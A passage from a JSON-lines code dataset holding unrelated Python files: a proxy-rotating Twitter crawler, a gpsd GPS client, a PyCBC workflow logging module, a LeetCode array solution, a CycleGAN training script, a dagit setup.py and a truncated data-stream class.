udprelay.UDPRelay(config, dns_resolver, True)\n\t\tloop = eventloop.EventLoop()\n\t\tdns_resolver.add_to_loop(loop)\n\t\ttcp_server.add_to_loop(loop)\n\t\tudp_server.add_to_loop(loop)\n\n\t\tdef handler(signum, _):\n\t\t\tlogging.warn('received SIGQUIT, doing graceful shutting down..')\n\t\t\ttcp_server.close(next_tick=True)\n\t\t\tudp_server.close(next_tick=True)\n\t\tsignal.signal(getattr(signal, 'SIGQUIT', signal.SIGTERM), handler)\n\n\t\tdef int_handler(signum, _):\n\t\t\tsys.exit(1)\n\t\tsignal.signal(signal.SIGINT, int_handler)\n\n\t\tdaemon.set_user(config.get('user', None))\n\t\tloop.run()\n\texcept Exception as e:\n\t\traise\n\nif __name__ == '__main__':\n\t#search condition\n\tstart_date = date(2015, 2, 1)\n\tend_date = date(2015, 2, 2)\n\tcompany = '$aapl'\n\tlang = 'en'\n\n\t#load Socks5 proxy settings\n\t#(in proxy-configs, where I stored some proxys I used to cross the GFW,\n\t#maybe you don't need it in America)\n\tf = open('proxy-configs', 'rb')\n\tconfigs = pickle.load(f)\n\tf.close()\n\n\t#open the file to save\n\tf = open('aapl-test', 'w')\n\tn = 0\n\tindex = random.randint(0, len(configs) - 1)\n\tindex = 0\n\n\t#As Twitter may block the crawler, the proxy is changed randomly\n\t#after crawling 1 day's tweets\n\twhile n <= int((end_date - start_date).days):\n\t\told_index = index\n\t\tindex = random.randint(0, len(configs) - 1)\n\n\n\t\twhile (index == old_index):\n\t\t\tindex = random.randint(0, len(configs) - 1)\n\n\t\tsingle_date = start_date + timedelta(n)\n\n\t\tp = multiprocessing.Process(target = deployProxy, args = (configs, index))\n\t\tprint('Using Proxy: %s' % configs[index]['remarks'])\n\t\tp.start()\n\t\tsleep(3)\n\t\tprint(\"crawling %s...\" % strftime(\"%Y-%m-%d\", single_date.timetuple()))\n\n\t\tr = crawl1DayTweet(f, single_date, company, lang)\n\t\tif r:\n\t\t\tprint(\"%s done.\" % strftime(\"%Y-%m-%d\", single_date.timetuple()))\n\t\t\tn += 1\n\n\t\tp.terminate()\n\tf.close()\n\n","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":3377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"253875317","text":"import socket\nimport json\nimport logging\nimport datetime\n\ngpsd_socket = None\ngpsd_stream = None\nstate = {}\ngpsTimeFormat = '%Y-%m-%dT%H:%M:%S.%fZ'\n\nlogger = logging.getLogger(__name__)\n\n\ndef _parse_state_packet(json_data):\n global state\n if json_data['class'] == 'DEVICES':\n if not json_data['devices']:\n logger.warn('No gps devices found')\n state['devices'] = json_data\n elif json_data['class'] == 'WATCH':\n state['watch'] = json_data\n else:\n raise Exception(\n \"Unexpected message received from gps: {}\".format(json_data['class']))\n\n\nclass NoFixError(Exception):\n pass\n\n\nclass GpsResponse(object):\n def __init__(self):\n self.mode = 0\n self.sats = 0\n self.sats_valid = 0\n self.lon = 0.0\n self.lat = 0.0\n self.alt = 0.0\n self.track = 0\n self.hspeed = 0\n self.climb = 0\n self.time = ''\n self.error = {}\n\n @classmethod\n def from_json(cls, packet):\n result = cls()\n if not packet['active']:\n raise UserWarning('GPS not active')\n last_tpv = packet['tpv'][-1]\n last_sky = packet['sky'][-1]\n\n if 'satellites' in last_sky:\n result.sats = len(last_sky['satellites'])\n result.sats_valid = len(\n [sat for sat in last_sky['satellites'] if sat['used'] == True])\n else:\n result.sats = 0;\n result.sats_valid = 0;\n\n result.mode = last_tpv['mode']\n\n if last_tpv['mode'] >= 2:\n result.lon = last_tpv['lon'] if 'lon' in last_tpv else 0.0\n result.lat = last_tpv['lat'] if 'lat' in last_tpv else 0.0\n result.track = last_tpv['track'] if 'track' in last_tpv else 0\n result.hspeed = last_tpv['speed'] if 'speed' in last_tpv else 0\n result.time = last_tpv['time'] if 'time' in last_tpv else ''\n result.error = {\n 'c': 0,\n 's': last_tpv['eps'] if 'eps' in last_tpv else 0,\n 't': last_tpv['ept'] if 'ept' in last_tpv else 0,\n 'v': 0,\n 'x': last_tpv['epx'] if 'epx' in last_tpv else 0,\n 'y': last_tpv['epy'] if 'epy' in last_tpv else 0\n }\n\n if last_tpv['mode'] >= 3:\n result.alt = last_tpv['alt'] if 'alt' in last_tpv else 0.0\n result.climb = last_tpv['climb'] if 'climb' in last_tpv else 0\n result.error['c'] = last_tpv['epc'] if 'epc' in last_tpv else 0\n result.error['v'] = last_tpv['epv'] if 'epv' in last_tpv else 0\n\n return result\n\n def position(self):\n if self.mode < 2:\n raise NoFixError(\"Needs at least 2D fix\")\n return self.lat, self.lon\n\n def altitude(self):\n if self.mode < 3:\n raise NoFixError(\"Needs at least 3D fix\")\n return self.alt\n\n def movement(self):\n if self.mode < 3:\n raise NoFixError(\"Needs at least 3D fix\")\n return {\"speed\": self.hspeed, \"track\": self.track, \"climb\": self.climb}\n\n def speed_vertical(self):\n if self.mode < 2:\n raise NoFixError(\"Needs at least 2D fix\")\n if abs(self.climb) < self.error['c']:\n return 0\n else:\n return self.climb\n\n def speed(self):\n if self.mode < 2:\n raise NoFixError(\"Needs at least 2D fix\")\n if self.hspeed < self.error['s']:\n return 0\n else:\n return self.hspeed\n\n def position_precision(self):\n if self.mode < 2:\n raise NoFixError(\"Needs at least 2D fix\")\n return max(self.error['x'], self.error['y']), self.error['v']\n\n def map_url(self):\n if self.mode < 2:\n raise NoFixError(\"Needs at least 2D fix\")\n return \"http://www.openstreetmap.org/?mlat={}&mlon={}&zoom=15\".format(self.lat, self.lon)\n\n def get_time(self, local_time=False):\n if self.mode < 2:\n raise NoFixError(\"Needs at least 2D fix\")\n time = datetime.datetime.strptime(self.time, gpsTimeFormat)\n\n if local_time:\n time = time.replace(tzinfo=datetime.timezone.utc).astimezone()\n\n return time\n\n def __repr__(self):\n modes = {\n 0: 'No mode',\n 1: 'No fix',\n 2: '2D fix',\n 3: '3D fix'\n }\n if self.mode < 2:\n return \"\".format(modes[self.mode])\n if self.mode == 2:\n return \"\".format(self.lat, self.lon)\n if self.mode == 3:\n return \"\".format(self.lat, self.lon, self.alt)\n\n\ndef connect(host=\"127.0.0.1\", port=2947):\n global gpsd_socket, gpsd_stream, verbose_output, state\n logger.debug(\"Connecting to gpsd socket at {}:{}\".format(host, port))\n gpsd_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n gpsd_socket.connect((host, port))\n gpsd_stream = gpsd_socket.makefile(mode=\"rw\")\n logger.debug(\"Waiting for welcome message\")\n welcome_raw = gpsd_stream.readline()\n welcome = json.loads(welcome_raw)\n if welcome['class'] != \"VERSION\":\n raise Exception(\n \"Unexpected data received as welcome. Is the server a gpsd 3 server?\")\n logger.debug(\"Enabling gps\")\n gpsd_stream.write('?WATCH={\"enable\":true}\\n')\n gpsd_stream.flush()\n\n for i in range(0, 2):\n raw = gpsd_stream.readline()\n parsed = json.loads(raw)\n _parse_state_packet(parsed)\n\n\ndef get_current():\n global gpsd_stream, verbose_output\n logger.debug(\"Polling gps\")\n gpsd_stream.write(\"?POLL;\\n\")\n gpsd_stream.flush()\n raw = gpsd_stream.readline()\n response = json.loads(raw)\n if response['class'] != 'POLL':\n raise Exception(\n \"Unexpected message received from gps: {}\".format(response['class']))\n return GpsResponse.from_json(response)\n\n\ndef device():\n global state\n return {\n 'path': state['devices']['devices'][0]['path'],\n 'speed': state['devices']['devices'][0]['bps'],\n 'driver': state['devices']['devices'][0]['driver']\n }","sub_path":"mesh-code/gps.py","file_name":"gps.py","file_ext":"py","file_size_in_byte":6126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"3850691","text":"# Copyright (C) 2014 Ian Harry\n#\n# This program is free software; you can redistribute it and/or modify it\n# under the terms of the GNU General Public License as published by the\n# Free Software Foundation; either version 3 of the License, or (at your\n# option) any later version.\n#\n# This program is distributed in the hope that it will be useful, but\n# WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General\n# Public License for more details.\n#\n# You should have received a copy of the GNU General Public License along\n# with this program; if not, write to the Free Software Foundation, Inc.,\n# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n\n#\n# =============================================================================\n#\n# Preamble\n#\n# =============================================================================\n#\n\n\"\"\"\nThis module is responsible for creating any files that log what the workflow\nhas done. This includes command line options sent to the workflow, analysis\ntimes used within the workflow, etc.\nhttps://ldas-jobs.ligo.caltech.edu/~cbc/docs/pycbc/NOTYETCREATED.html\n\"\"\"\n\nimport logging\nfrom pycbc.workflow.core import File, FileList, make_analysis_dir\nfrom glue.ligolw import ligolw, utils\nfrom glue.ligolw.utils import process\nfrom glue.segmentdb import segmentdb_utils\nfrom glue.segments import segmentlist\n\ndef setup_analysislogging(workflow, segs_list, insps, args, output_dir,\n program_name=\"workflow\", tags=[]):\n \"\"\"\n This module sets up the analysis logging xml file that contains the\n following information:\n\n * Command line arguments that the code was run with\n * Segment list of times marked as SCIENCE\n * Segment list of times marked as SCIENCE and \"OK\" ie. not CAT_1 vetoed\n * Segment list of times marked as SCIENCE_OK and present on the cluster\n * The times that will be analysed by the matched-filter jobs\n\n Parameters\n -----------\n workflow : pycbc.workflow.core.Workflow\n The Workflow instance.\n segs_list : pycbc.workflow.core.FileList\n A list of Files containing the information needed to generate the\n segments above. For segments generated at run time the associated\n segmentlist is a property of this object.\n insps : pycbc.workflow.core.FileList\n The output files from the matched-filtering module. Used to identify\n what times have been analysed in this workflow.\n output_dir : path\n Directory to output any files to.\n program_name : string (optional, default = \"workflow\")\n The program name to stick in the process/process_params tables.\n tags : list (optional, default = [])\n If given restrict to considering inspiral and segment files that\n are tagged with all tags in this list.\n \"\"\"\n logging.info(\"Entering analysis logging module.\")\n make_analysis_dir(output_dir)\n\n # Construct the summary XML file\n outdoc = ligolw.Document()\n outdoc.appendChild(ligolw.LIGO_LW())\n\n # Add process and process_params tables\n proc_id = process.register_to_xmldoc(outdoc, program_name,\n vars(args) ).process_id\n\n # Now add the various segment lists to this file\n summ_segs = segmentlist([workflow.analysis_time])\n \n # If tags is given filter by tags\n if tags:\n for tag in tags:\n segs_list = segs_list.find_output_with_tag(tag)\n insps = insps.find_output_with_tag(tag)\n\n for ifo in workflow.ifos:\n # Lets get the segment lists we need\n seg_ifo_files = segs_list.find_output_with_ifo(ifo)\n # SCIENCE\n sci_seg_file = seg_ifo_files.find_output_with_tag('SCIENCE')\n if len(sci_seg_file) == 1:\n sci_seg_file = sci_seg_file[0]\n sci_segs = sci_seg_file.segmentList\n sci_def_id = segmentdb_utils.add_to_segment_definer(outdoc, proc_id,\n ifo, \"CBC_WORKFLOW_SCIENCE\", 0)\n segmentdb_utils.add_to_segment(outdoc, proc_id, sci_def_id,\n sci_segs)\n segmentdb_utils.add_to_segment_summary(outdoc, proc_id, sci_def_id,\n summ_segs, comment='')\n elif sci_seg_file:\n err_msg = \"Got %d files matching %s and %s. Expected 1 or 0.\" \\\n %(len(sci_seg_file), ifo, 'SCIENCE')\n raise ValueError(err_msg)\n\n # SCIENCE_OK\n sci_ok_seg_file = seg_ifo_files.find_output_with_tag('SCIENCE_OK')\n if len(sci_ok_seg_file) == 1:\n sci_ok_seg_file = sci_ok_seg_file[0]\n sci_ok_segs = sci_ok_seg_file.segmentList\n sci_ok_def_id = segmentdb_utils.add_to_segment_definer(outdoc,\n proc_id, ifo, \"CBC_WORKFLOW_SCIENCE_OK\", 0)\n segmentdb_utils.add_to_segment(outdoc, proc_id, sci_ok_def_id,\n sci_ok_segs)\n segmentdb_utils.add_to_segment_summary(outdoc, proc_id,\n sci_ok_def_id, summ_segs, comment='')\n elif sci_ok_seg_file:\n err_msg = \"Got %d files matching %s and %s. Expected 1 or 0.\" \\\n %(len(sci_ok_seg_file), ifo, 'SCIENCE_OK')\n raise ValueError(err_msg)\n\n\n # SCIENCE_AVAILABLE\n sci_available_seg_file = seg_ifo_files.find_output_with_tag(\\\n 'SCIENCE_AVAILABLE')\n if len(sci_available_seg_file) == 1:\n sci_available_seg_file = sci_available_seg_file[0]\n sci_available_segs = sci_available_seg_file.segmentList\n sci_available_def_id = segmentdb_utils.add_to_segment_definer(\\\n outdoc, proc_id, ifo, \"CBC_WORKFLOW_SCIENCE_AVAILABLE\", 0)\n segmentdb_utils.add_to_segment(outdoc, proc_id,\n sci_available_def_id, sci_available_segs)\n segmentdb_utils.add_to_segment_summary(outdoc, proc_id,\n sci_available_def_id, summ_segs, comment='')\n elif sci_available_seg_file:\n err_msg = \"Got %d files matching %s and %s. Expected 1 or 0.\" \\\n %(len(sci_available_seg_file), ifo, 'SCIENCE_AVAILABLE')\n raise ValueError(err_msg)\n\n # ANALYSABLE - This one needs to come from inspiral outs\n ifo_insps = insps.find_output_with_ifo(ifo)\n analysable_segs = ifo_insps.get_times_covered_by_files()\n\n analysable_def_id = segmentdb_utils.add_to_segment_definer(outdoc,\n proc_id, ifo, \"CBC_WORKFLOW_ANALYSABLE\", 0)\n segmentdb_utils.add_to_segment(outdoc, proc_id, analysable_def_id,\n analysable_segs)\n segmentdb_utils.add_to_segment_summary(outdoc, proc_id,\n analysable_def_id, summ_segs, comment='')\n\n summ_file = File(workflow.ifos, \"WORKFLOW_SUMMARY\",\n workflow.analysis_time, extension=\".xml\",\n directory=output_dir)\n summ_file.PFN(summ_file.storage_path, site='local')\n utils.write_filename(outdoc, summ_file.storage_path)\n\n return FileList([summ_file])\n\n","sub_path":"pycbc/workflow/analysislogging.py","file_name":"analysislogging.py","file_ext":"py","file_size_in_byte":7502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"270229786","text":"# Duplicate Zeros\n# Given a fixed length array arr of integers, duplicate each occurrence of zero, shifting the remaining elements to the right.\n# Note that elements beyond the length of the original array are not written.\n# Do the above modifications to the input array in place, do not return anything from your function.\n\nclass Solution:\n def duplicateZeros(self, arr: List[int]) -> None:\n \"\"\"\n Do not return anything, modify arr in-place instead.\n \"\"\"\n tmp = 0\n l = len(arr) - 1\n for i in range(l + 1):\n if i + tmp > l:\n break\n \n if arr[i] == 0:\n if i == l - tmp:\n arr[l] = 0\n l -= 1\n break\n tmp += 1\n\n last = l - tmp\n\n for i in range(last, -1, -1):\n if arr[i] == 0:\n arr[i + tmp] = 0\n tmp -= 1\n arr[i + tmp] = 0\n else:\n arr[i + tmp] = arr[i]\n","sub_path":"task04.py","file_name":"task04.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"626809999","text":"#######################################################################################\n# Title: CycleGAN\n# Author: [A_K_Nain](https://twitter.com/A_K_Nain)\n# Date created: 2020/08/12\n# Last modified: 2020/08/12\n# Description: Implementation of CycleGAN.\n#\n# CycleGAN\n#\n# CycleGAN is a model that aims to solve the image-to-image translation\n# problem. The goal of the image-to-image translation problem is to learn the\n# mapping between an input image and an output image using a training set of\n# aligned image pairs. However, obtaining paired examples isn't always feasible.\n# CycleGAN tries to learn this mapping without requiring paired input-output images,\n# using cycle-consistent adversarial networks.\n#\n# - [Paper](https://arxiv.org/pdf/1703.10593.pdf)\n# - [Original implementation](https://github.com/junyanz/pytorch-CycleGAN-and-pix2pix)\n#######################################################################################\n# Copyright (C) 2020-2021 Habana Labs, Ltd. an Intel Company\n#######################################################################################\n\nimport os\nimport re\n\nimport tensorflow as tf\nfrom tensorflow import keras\nimport tensorflow_addons as tfa\nimport tensorflow_datasets as tfds\nfrom tensorflow.data.experimental import AUTOTUNE as autotune\n\nfrom TensorFlow.common.tb_utils import TensorBoardWithHParamsV2, ExamplesPerSecondKerasHookV2\nfrom TensorFlow.common.debug import dump_callback\nfrom habana_frameworks.tensorflow.ops.instance_norm import HabanaInstanceNormalization\nfrom arguments import CycleGANArgParser\nfrom data import TrasformInputs\nfrom modeling import get_discriminator, get_resnet_generator, CycleGan, TFPool\nfrom monitoring import GANMonitor\nfrom loss import get_adversarial_losses_fn\n\n\ndef is_master(use_hvd, horovod):\n return use_hvd is False or horovod.rank() == 0\n\n\ndef is_local_master(use_hvd, horovod):\n return use_hvd is False or horovod.local_rank() == 0\n\n\ndef train(args, cycle_gan_model, train_ds, test_ds, checkpoint=None, horovod=None):\n gen_X = cycle_gan_model.gen_X\n gen_Y = cycle_gan_model.gen_Y\n cycle_loss_fn = keras.losses.MeanAbsoluteError()\n id_loss_fn = keras.losses.MeanAbsoluteError()\n discriminator_loss_fn, generator_loss_fn = get_adversarial_losses_fn(\n 'lsgan')\n\n lr_opts = dict(\n gen_optimizer=args.generator_lr,\n disc_optimizer=args.discriminator_lr,\n )\n\n if args.use_horovod:\n for k in lr_opts.keys():\n lr_opts[k] *= horovod.size()\n\n # Callbacks\n hooks = []\n if args.use_hooks and (args.log_all_workers or is_local_master(args.use_horovod, horovod)):\n\n hparams = {\n 'batch_size': args.batch_size,\n 'precision': args.data_type,\n 'epochs': args.epochs,\n 'logdir': args.logdir,\n 'hvd_workers': args.hvd_workers\n }\n tb = TensorBoardWithHParamsV2(\n hparams, log_dir=os.path.join(args.logdir, \"train\"))\n examples_per_sec = ExamplesPerSecondKerasHookV2(\n output_dir=os.path.join(args.logdir, \"train\"), batch_size=args.batch_size)\n\n # Apply the preprocessing operations to the test data\n file_writer_imgs = tf.summary.create_file_writer(\n os.path.join(args.logdir, 'imgs'))\n plotter = GANMonitor(\n file_writer_imgs, test_ds[0], test_ds[1], freq=args.monitor_freq)\n steps_per_epoch = int(train_ds.reduce(0, lambda x, _: x+1).numpy()\n ) if args.steps_per_epoch is None else args.steps_per_epoch\n save_every_n_steps = args.save_freq*steps_per_epoch\n checkpoint_filename = \"cyclegan_checkpoints.{epoch:03d}\"\n hooks += [plotter, tb, examples_per_sec,\n keras.callbacks.ModelCheckpoint(filepath=os.path.join(args.logdir, checkpoint_filename), save_weights_only=True, save_freq=save_every_n_steps)]\n\n if not args.no_lr_optimizer:\n from scheduling import MultiOptimizerLR, CosineDecay\n scheduler_hook = MultiOptimizerLR(initial_lr=lr_opts,\n multiplier=CosineDecay(steps=args.epochs - args.cosine_decay_delay,\n clif=args.cosine_decay_delay))\n hooks += [scheduler_hook]\n\n start_epoch = 0\n if checkpoint:\n print(f'Resuming from {checkpoint}')\n start_epoch = int(re.search(r'[0-9]{3}', checkpoint)[0])\n cycle_gan_model.load_weights(checkpoint)\n else:\n print(f'Couldn\\'t find checkpoint at {args.logdir}')\n\n pool_F = None\n pool_G = None\n if args.pool_size > 0:\n print('Populating pool')\n pool_F = []\n pool_G = []\n for i, (A, B) in enumerate(train_ds):\n if i >= args.pool_size // args.batch_size:\n break\n pool_F.append(gen_X(A))\n pool_G.append(gen_Y(B))\n pool_F = TFPool(tf.concat(pool_F, 0), batch_size=args.batch_size)\n pool_G = TFPool(tf.concat(pool_G, 0), batch_size=args.batch_size)\n print(\n f'Done, sample count- F: {pool_F.pool.shape[0]}, G: {pool_G.pool.shape[0]}')\n\n cycle_gan_model.compile(\n gen_optimizer=keras.optimizers.Adam(\n learning_rate=lr_opts[\"gen_optimizer\"], beta_1=0.5),\n disc_optimizer=keras.optimizers.Adam(\n learning_rate=lr_opts[\"disc_optimizer\"], beta_1=0.5),\n gen_loss_fn=generator_loss_fn, cycle_loss=cycle_loss_fn, id_loss=id_loss_fn,\n disc_loss_fn=discriminator_loss_fn, hvd=horovod if args.use_horovod else None, pool_f=pool_F, pool_g=pool_G)\n print('Model is compiled, setting hooks')\n if is_local_master(args.use_horovod, horovod):\n print('Saving initial checkpoint')\n cycle_gan_model.save_weights(os.path.join(\n args.logdir, f'init_checkpoint.{start_epoch:03d}'))\n if args.use_horovod:\n horovod.broadcast_variables(cycle_gan_model.variables, 0)\n print('Start model training')\n with dump_callback(args.dumps_config):\n cycle_gan_model.fit(\n train_ds,\n epochs=args.epochs,\n initial_epoch=start_epoch,\n steps_per_epoch=args.steps_per_epoch,\n callbacks=hooks,\n verbose=is_master(args.use_horovod, horovod),\n )\n if is_local_master(args.use_horovod, horovod):\n print('Saving final checkpoint')\n cycle_gan_model.save_weights(os.path.join(\n args.logdir, f'final_checkpoint.{args.epochs:03d}'))\n\n\ndef eval(args, cycle_gan_model, test_ds, input_transformation, checkpoint=None):\n test_horses, test_zebras = test_ds\n # Load the checkpoints\n if not cycle_gan_model._is_compiled:\n cycle_gan_model.load_weights(checkpoint).expect_partial()\n print(\"Weights loaded successfully\")\n test_horses = (\n test_horses.map(input_transformation.preprocess_test_image,\n num_parallel_calls=autotune)\n .take(20).batch(1)\n )\n test_zebras = (\n test_zebras.map(input_transformation.preprocess_test_image,\n num_parallel_calls=autotune)\n .take(20).batch(1)\n )\n print('Running horses to zebras')\n test_image_path = os.path.join(\n args.logdir, 'test_images', 'horses_to_zebras')\n os.makedirs(test_image_path, exist_ok=True)\n for i, img in enumerate(test_horses):\n prediction = cycle_gan_model.gen_Y(img, training=False)\n prediction = input_transformation.denormalizer(prediction)\n prediction = keras.preprocessing.image.array_to_img(prediction[0])\n prediction.save(os.path.join(\n test_image_path, f\"predicted_img_{i}.png\"))\n print('Running zebras to horses')\n test_image_path = os.path.join(\n args.logdir, 'test_images', 'zebras_to_horses')\n os.makedirs(test_image_path, exist_ok=True)\n for i, img in enumerate(test_zebras):\n prediction = cycle_gan_model.gen_X(img, training=False)\n prediction = input_transformation.denormalizer(prediction)\n prediction = keras.preprocessing.image.array_to_img(prediction[0])\n prediction.save(os.path.join(\n test_image_path, f\"predicted_img_{i}.png\"))\n\n\ndef main():\n parser = CycleGANArgParser(is_demo=False)\n args = parser.parse_args()\n if not args.no_hpu:\n from habana_frameworks.tensorflow import load_habana_module\n load_habana_module()\n args.habana_instance_norm = False\n os.environ['TF_REWRITERS_CONFIG_FILE'] = 'rewriters_config'\n if args.habana_instance_norm:\n tfa.layers.InstanceNormalization = HabanaInstanceNormalization\n if args.data_type == 'bf16':\n tf.keras.mixed_precision.set_global_policy('mixed_bfloat16')\n if args.run_deterministic:\n tf.random.set_seed(12345)\n input_image_shape = (args.crop, args.crop, 3)\n input_transformation = TrasformInputs(orig_img_size=(\n args.resize, args.resize), input_img_size=(args.crop, args.crop))\n\n horovod = None\n if args.use_horovod:\n from TensorFlow.common.horovod_helpers import hvd as horovod\n horovod.init()\n if args.log_all_workers:\n args.logdir = os.path.join(args.logdir, f\"worker_{horovod.rank()}\")\n\n tfds.disable_progress_bar()\n # Load the horse-zebra dataset using tensorflow-datasets.\n if is_local_master(args.use_horovod, horovod):\n dataset, _ = tfds.load(\"cycle_gan/horse2zebra\", data_dir=args.dataset_dir,\n with_info=True, as_supervised=True, download=True)\n if args.use_horovod:\n horovod.broadcast(0, 0) # nodes synchronization\n else:\n if args.use_horovod:\n horovod.broadcast(0, 0)\n dataset, _ = tfds.load(\n \"cycle_gan/horse2zebra\", data_dir=args.dataset_dir, with_info=True, as_supervised=True)\n\n train_horses, train_zebras = dataset[\"trainA\"], dataset[\"trainB\"]\n test_horses, test_zebras = dataset[\"testA\"], dataset[\"testB\"]\n\n # Apply the preprocessing operations to the training data\n train_horses = (\n train_horses.map(\n input_transformation.preprocess_train_image, num_parallel_calls=1 if args.run_deterministic else autotune)\n .cache()\n .shuffle(args.buffer)\n .batch(args.batch_size, drop_remainder=True)\n )\n train_zebras = (\n train_zebras.map(\n input_transformation.preprocess_train_image, num_parallel_calls=1 if args.run_deterministic else autotune)\n .cache()\n .shuffle(args.buffer)\n .batch(args.batch_size, drop_remainder=True)\n )\n train_ds = tf.data.Dataset.zip((train_horses, train_zebras))\n test_ds = test_horses, test_zebras\n\n disc_X = get_discriminator(input_image_shape, name=\"discriminator_X\")\n disc_Y = get_discriminator(input_image_shape, name=\"discriminator_Y\")\n gen_X = get_resnet_generator(input_image_shape, name=\"generator_X\")\n gen_Y = get_resnet_generator(input_image_shape, name=\"generator_Y\")\n\n # Create cycle gan model\n cycle_gan_model = CycleGan(\n generator_X=gen_X, generator_Y=gen_Y, discriminator_X=disc_X, discriminator_Y=disc_Y\n )\n\n latest = None\n if args.restore:\n print(f\"Trying to restore checkpoint from {args.logdir}\")\n latest = tf.train.latest_checkpoint(args.logdir)\n\n if args.train:\n train(args, cycle_gan_model, train_ds, test_ds, latest, horovod)\n\n if args.test and is_master(args.use_horovod, horovod):\n eval(args, cycle_gan_model, test_ds, input_transformation, latest)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"TensorFlow/computer_vision/CycleGAN/cycle_gan.py","file_name":"cycle_gan.py","file_ext":"py","file_size_in_byte":11552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"343889914","text":"import argparse\nimport sys\nimport os\n\nfrom setuptools import find_packages, setup\n\n# pylint: disable=E0401, W0611\nif sys.version_info[0] < 3:\n import __builtin__ as builtins\nelse:\n import builtins\n\n\ndef long_description():\n here = os.path.abspath(os.path.dirname(__file__))\n with open(os.path.join(here, 'README.rst'), 'r') as fh:\n return fh.read()\n\n\ndef get_version(name):\n version = {}\n with open(\"dagit/version.py\") as fp:\n exec(fp.read(), version) # pylint: disable=W0122\n\n if name == 'dagit':\n return version['__version__']\n else:\n return version['__version__'] + version['__nightly__']\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--nightly', action='store_true')\n\n\ndef _do_setup(name='dagit'):\n setup(\n name=name,\n version=get_version(name),\n author='Elementl',\n license='Apache-2.0',\n description='Web UI for dagster.',\n long_description=long_description(),\n long_description_content_type='text/markdown',\n url='https://github.com/dagster-io/dagster',\n classifiers=[\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3.7',\n 'License :: OSI Approved :: Apache Software License',\n 'Operating System :: OS Independent',\n ],\n packages=find_packages(exclude=['dagit_tests']),\n include_package_data=True,\n install_requires=[\n # standard python 2/3 compatability things\n 'enum34>=1.1.6',\n 'future>=0.16.0',\n # cli\n # 'click>=6.7',\n # 'coloredlogs>=10.0',\n # 'graphviz>=0.8.3',\n 'pyyaml>=3.12',\n # core (not explicitly expressed atm)\n 'six>=1.11.0',\n # cli\n 'click>=6.7',\n # dagster\n # 'dagster>=0.3.0rc1',\n # FIXME: Temporarily loosen restriction while we work out kinks in publish process\n # See Issue #499\n 'dagster',\n # graphql\n 'graphql-core>=2.1',\n 'graphene>=2.1.3',\n # server\n 'Flask-GraphQL>=2.0.0',\n 'Flask-Sockets>=0.2.1',\n 'Flask>=1.0.2',\n 'flask-cors>=3.0.6',\n 'gevent-websocket==0.10.1',\n 'gevent==1.3.7',\n 'graphql-ws>=0.3.0',\n 'pyrsistent>=0.14.8',\n # watchdog\n 'watchdog>=0.8.3',\n # notebooks support\n 'nbconvert>=5.4.0',\n # dev/test - Installed via dev-requirements.txt\n # 'pylint>=1.8.4',\n # 'pytest>=3.5.1',\n # 'recommonmark>=0.4.0',\n # 'rope>=0.10.7',\n # 'Sphinx>=1.7.5',\n # 'sphinx-autobuild>=0.7.1',\n # 'yapf>=0.22.0',\n # 'twine>=1.11.0',\n # 'pre-commit'>=1.10.1',\n ],\n entry_points={\"console_scripts\": ['dagit = dagit.cli:main']},\n )\n\n\nif __name__ == '__main__':\n parsed, unparsed = parser.parse_known_args()\n sys.argv = [sys.argv[0]] + unparsed\n if parsed.nightly:\n _do_setup('dagit-nightly')\n else:\n _do_setup('dagit')\n","sub_path":"python_modules/dagit/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":3299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"67281325","text":"import numpy as np\nfrom sakura.common.chunk import NumpyChunk\nfrom sakura.daemon.processing.tools import Registry\nfrom sakura.daemon.processing.cache import Cache\nfrom sakura.daemon.processing.column import Column\n\nclass OutputStreamBase(Registry):\n def __init__(self, label):\n self.columns = []\n self.label = label\n self.length = None\n self.range_iter_cache = Cache(10)\n def add_column(self, col_label, col_type, col_tags=()):\n return self.register(self.columns, Column,\n col_label, col_type, tuple(col_tags),\n self, len(self.columns))\n def pack(self):\n return dict(label = self.label,\n columns = self.columns,\n length = self.length)\n def get_range(self, row_start, row_end, columns=None, filters=()):\n chunk_len = row_end-row_start\n # try to reuse the last iterator\n it = self.range_iter_cache.get(row_start, row_end, columns, filters)\n in_cache = it is not None\n # otherwise, create a new iterator\n if not in_cache:\n stream = self\n if columns is not None:\n stream = stream.select_columns(*columns)\n for condition in filters:\n stream = stream.filter(condition)\n it = stream.chunks(chunk_len, row_start)\n # read next chunk and return it\n for chunk in it:\n # update info about last iterator\n new_row_start = row_start + chunk.size\n self.range_iter_cache.save(it,\n new_row_start, new_row_start + chunk_len, columns, filters)\n return chunk\n # if we are here, stream has ended, forget about iterator and\n # return empty chunk\n if in_cache:\n self.range_iter_cache.forget(it)\n return NumpyChunk(0, self.get_dtype())\n def get_dtype(self):\n return np.dtype(list(col.get_dtype() for col in self.columns))\n def select_columns(self, *columns):\n # verify that at least 1 column is specified\n if len(columns) == 0:\n return self\n # column objects or indices are accepted\n if isinstance(columns[0], int):\n col_indexes = tuple(columns)\n else:\n col_indexes = tuple(col.index for col in columns)\n # if all columns are selected in the same order, return self...\n if col_indexes == tuple(range(len(self.columns))):\n return self\n # compute a substream\n return self.__select_columns__(*col_indexes)\n def filter(self, cond):\n col, comp_op, other = cond\n # column object or index are accepted\n if isinstance(col, int):\n col_index = col\n else:\n col_index = col.index\n # compute a substream\n return self.__filter__(col_index, comp_op, 